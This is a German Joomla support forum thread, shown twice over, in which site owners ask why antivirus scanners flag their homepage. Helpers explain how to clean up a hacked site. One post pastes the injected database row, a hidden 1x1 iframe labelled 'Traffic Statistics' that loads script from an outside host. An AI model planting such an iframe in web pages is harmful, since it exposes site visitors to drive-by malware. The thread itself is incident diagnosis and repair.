Virescanneralarm bei Seitenaufruf

mkern · Registriert seit: 02.01.2008

Hallo,

da ich kein passende Posting gefunden habe, hier ein neuer Thread. Ich habe das Problem, dass beim Aufruf meiner Joomla Startseite, etwaige Virenscanner Alarm schlagen. Schaut man sich an was passiert, so wird ein iframe-Aufruf auf die wp-stats-php.info) aufgrufen. Innerhalb der Module und des Contents, ist dieser Iframe allerdings nicht zu finden.
Schaut man sich über den Explorer direkt den Quelltext an, taucht der entsprechende iframe code auf.

Ich weiss solangsam nicht mehr wo ich suchen soll.

Wäre somit für Hilfe dankbar.

Gruß
Matthias

rickkp · Registriert seit: 08.03.2007

Vermutlich wurdest du gehackt.

Schau dir meine Signatur an und vergleiche die Liste der unsicheren Komponenten mit deinen installierten. Suche hier im Sicherheit Forum nach Exploit und vergleiche diese mit deinen installierten Komponenten.

Mach ein Backup deiner Joomla Dateien und der Datenbank!
Lösche deine Joomla Dateien!
Durchsuche die Datenbank nach dubiosem Code!

Um nicht sofort wieder gehackt zu werden, empfehle ich deine Seite mit einer htaccess vor öffentlichem Zugriff zu schützen.

Spiele ein Backup ein!

Entferne die Komponenten für die es keine Fix gibt!
Installiere für die Komponenten den Fix falls verfügbar!
Aktualisiere auf die Aktuelle Joomla Version 1.0.13!

Entferne die Passwort htaccess und aktiviere die Joomla eigene htaccess.

WebAdmin · Registriert seit: 31.12.2007

Zitat:

Zitat von rickkp

Vermutlich wurdest du gehackt.

Um nicht sofort wieder gehackt zu werden, empfehle ich deine Seite mit einer htaccess vor öffentlichem Zugriff zu schützen.

Spiele ein Backup ein!

Entferne die Komponenten für die es keine Fix gibt!
Installiere für die Komponenten den Fix falls verfügbar!
Aktualisiere auf die Aktuelle Joomla Version 1.0.13!

Entferne die Passwort htaccess und aktiviere die Joomla eigene htaccess.

Noch besser, die .htaccess ins root von Joomla und den Adminordner mit einer "Passwort htaccess" zusätzlich schützen.

Das sollte so eigentlich längst Standard sein.

Gruß, WebAdmin

flotte · Registriert seit: 20.03.2005

Zitat:

Zitat von mkern

...Ich habe das Problem, dass beim Aufruf meiner Joomla Startseite, etwaige Virenscanner Alarm schlagen. Schaut man sich an was passiert, so wird ein iframe-Aufruf auf die wp-stats-php.info) aufgrufen. Innerhalb der Module und des Contents, ist dieser Iframe allerdings nicht zu finden.
Schaut man sich über den Explorer direkt den Quelltext an, taucht der entsprechende iframe code auf...

Der HTML-Code wird JavaScript-codiert in den Sourcen vorhanden sein. Suche nach "iframe" wird daher nicht funktionieren.

Sofern dies so ist, stellt sich die Frage, wie der Code dahingekommen ist.
Aller Wahrscheinlichkeit nach hat jemand Deine Sourcen geändert - Du wurdest also "gehackt", wie man so schön sagt. Nimm die Seite auf jeden Fall erst mal offline, sofern Du nciht wissentlich Schadcode verteilen wisst.
Alles weitere zum Vorhehen bei gehackten Seiten: Lies die Tips hier im Forum.

mkern · Registriert seit: 02.01.2008

Hallo,

vielen Dank für die Hinweise und Informationen. Es scheint tatsächlich ein "gehacktes" Modul gewesen zu sein, von dem ich es allerdings am wenigsten erwartet hätte (expose gallery, wie es scheint). Habe entsprechend euren/ihren empfehlungen die Sicherheitseinstellungen angepasst (.htaccess) sowie das modul erstmal vom start genommen. Vernünftige Alternativen scheint es zur Expose Gallery aber leider nicht zu geben.

Aber nochmals. Vielen Dank.

Gruß
Matthias

loleke · Registriert seit: 30.04.2006

Hallo!

Ich habe momentan das selbe Problem.
Habe mal meine Datenbank durchstöbert und das gefunden.
--
-- Daten für Tabelle `jos_modules`
--
...
...
(58, 'Joomla Info', ' <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> ', 23, 'left', 0, '0000-00-00 00:00:00', 1, '', 0, 0, 0, 'moduleclass_sfx=-tikeim\r\ncache=0\r\nfirebots=0\r\nrssurl=\r\nrsst itle=0\r\nrssdesc=0\r\nrssimage=0\r\nrssitems=0\r\ nrssitemdesc=0\r\nword_count=0\r\nrsscache=3600\r\ n', 0, 0),

kann jemand damit was anfangen???

keraM · Registriert seit: 12.03.2006

Vor 4 Tagen wurde Deine Frage bereits in diesem Forum beantwortet. Scroll doch bitte einfach mal ein bißchen nach unten oder benutze die Suchfunktion des Forums.

loleke · Registriert seit: 30.04.2006

Zitat:

Zitat von keraM

Vor 4 Tagen wurde Deine Frage bereits in diesem Forum beantwortet. Scroll doch bitte einfach mal ein bißchen nach unten oder benutze die Suchfunktion des Forums.

mag ja gut und schön sein, allerings hat mich die suchfunktion nur zu diesem beitrag weiterverholfen. und zu dem kannst du mir auch glauben, dass ich die 5 beiträge mir schon durchgelesen habe, sie mich aber nur teilweise weitergebracht haben, sonst hätte ich hier bestimmt auch nichts geschrieben!

el_bastardo · Registriert seit: 05.03.2007

dieser hack tauchte schon des öfteren bei wordpress blogs auf. deshalb die tarnung als wp-stats.php.
von der seite wp-stats-php.info wird irgendwelches javascript in den iframe geladen,das sicher nichts gutes im sinn hat. google jedenfalls sanktioniert diese infizierten seiten. deshalb schnell was unternehmen wenn dir dein page-rank lieb ist.
wordpress scheint durch ein update darauf reagiert zu haben. bei joomla wir der iframe wohl über eine unsichere komponente eingeschleust.

loleke · Registriert seit: 30.04.2006

Zitat:

Zitat von el_bastardo

dieser hack tauchte schon des öfteren bei wordpress blogs auf. deshalb die tarnung als wp-stats.php.
von der seite wp-stats-php.info wird irgendwelches javascript in den iframe geladen,das sicher nichts gutes im sinn hat. google jedenfalls sanktioniert diese infizierten seiten. deshalb schnell was unternehmen wenn dir dein page-rank lieb ist.
wordpress scheint durch ein update darauf reagiert zu haben. bei joomla wir der iframe wohl über eine unsichere komponente eingeschleust.

supi danke... habe das modul jetzt erstmal deaktiviert. dürfte ja da erstmal nichts passieren, oder??

Themen-Optionen	Thema durchsuchen
Druckbare Version zeigen Diese Seite per E-Mail verschicken	Thema durchsuchen: Erweiterte Suche
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln


mkern Joomla Newbie Registriert seit: 02.01.2008 Beiträge: 2 Bedankte sich: 0 0 Danksagungen in 0 Beiträgen	Virescanneralarm bei Seitenaufruf Hallo, da ich kein passende Posting gefunden habe, hier ein neuer Thread. Ich habe das Problem, dass beim Aufruf meiner Joomla Startseite, etwaige Virenscanner Alarm schlagen. Schaut man sich an was passiert, so wird ein iframe-Aufruf auf die wp-stats-php.info) aufgrufen. Innerhalb der Module und des Contents, ist dieser Iframe allerdings nicht zu finden. Schaut man sich über den Explorer direkt den Quelltext an, taucht der entsprechende iframe code auf. Ich weiss solangsam nicht mehr wo ich suchen soll. Wäre somit für Hilfe dankbar. Gruß Matthias


rickkp Joomlaking Registriert seit: 08.03.2007 Beiträge: 734 Bedankte sich: 10 189 Danksagungen in 168 Beiträgen	Vermutlich wurdest du gehackt. Schau dir meine Signatur an und vergleiche die Liste der unsicheren Komponenten mit deinen installierten. Suche hier im Sicherheit Forum nach Exploit und vergleiche diese mit deinen installierten Komponenten. Mach ein Backup deiner Joomla Dateien und der Datenbank! Lösche deine Joomla Dateien! Durchsuche die Datenbank nach dubiosem Code! Um nicht sofort wieder gehackt zu werden, empfehle ich deine Seite mit einer htaccess vor öffentlichem Zugriff zu schützen. Spiele ein Backup ein! Entferne die Komponenten für die es keine Fix gibt! Installiere für die Komponenten den Fix falls verfügbar! Aktualisiere auf die Aktuelle Joomla Version 1.0.13! Entferne die Passwort htaccess und aktiviere die Joomla eigene htaccess. __________________ Hilfe gibt es unter Angabe von: Hoster, Joomla Version, Installierte Komponenten, PHPInfo, Problembeschreibung Joomla 1.5 Anleitung - CHMOD Verzeichnisse 755 \| Dateien 644 \| 777 du wirst gehackt! Info: Privat Support nur gegen Vorkasse


loleke Joomlaianer Registriert seit: 30.04.2006 Beiträge: 73 Bedankte sich: 4 0 Danksagungen in 0 Beiträgen	Hallo! Ich habe momentan das selbe Problem. Habe mal meine Datenbank durchstöbert und das gefunden. -- -- Daten für Tabelle `jos_modules` -- ... ... (58, 'Joomla Info', '<!-- Traffic Statistics --> <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->', 23, 'left', 0, '0000-00-00 00:00:00', 1, '', 0, 0, 0, 'moduleclass_sfx=-tikeim\r\ncache=0\r\nfirebots=0\r\nrssurl=\r\nrsst itle=0\r\nrssdesc=0\r\nrssimage=0\r\nrssitems=0\r\ nrssitemdesc=0\r\nword_count=0\r\nrsscache=3600\r\ n', 0, 0), kann jemand damit was anfangen???


keraM Premium Supporter Registriert seit: 12.03.2006 Ort: Dresden Beiträge: 5,620 Bedankte sich: 88 1,295 Danksagungen in 1,213 Beiträgen	Vor 4 Tagen wurde Deine Frage bereits in diesem Forum beantwortet. Scroll doch bitte einfach mal ein bißchen nach unten oder benutze die Suchfunktion des Forums. __________________ Gruß keraM Joomla-FAQ: --> Klick! Kein Support per PN!


el_bastardo Joomlaianer Registriert seit: 05.03.2007 Ort: Graz Beiträge: 61 Bedankte sich: 4 13 Danksagungen in 13 Beiträgen	dieser hack tauchte schon des öfteren bei wordpress blogs auf. deshalb die tarnung als wp-stats.php. von der seite wp-stats-php.info wird irgendwelches javascript in den iframe geladen,das sicher nichts gutes im sinn hat. google jedenfalls sanktioniert diese infizierten seiten. deshalb schnell was unternehmen wenn dir dein page-rank lieb ist. wordpress scheint durch ein update darauf reagiert zu haben. bei joomla wir der iframe wohl über eine unsichere komponente eingeschleust.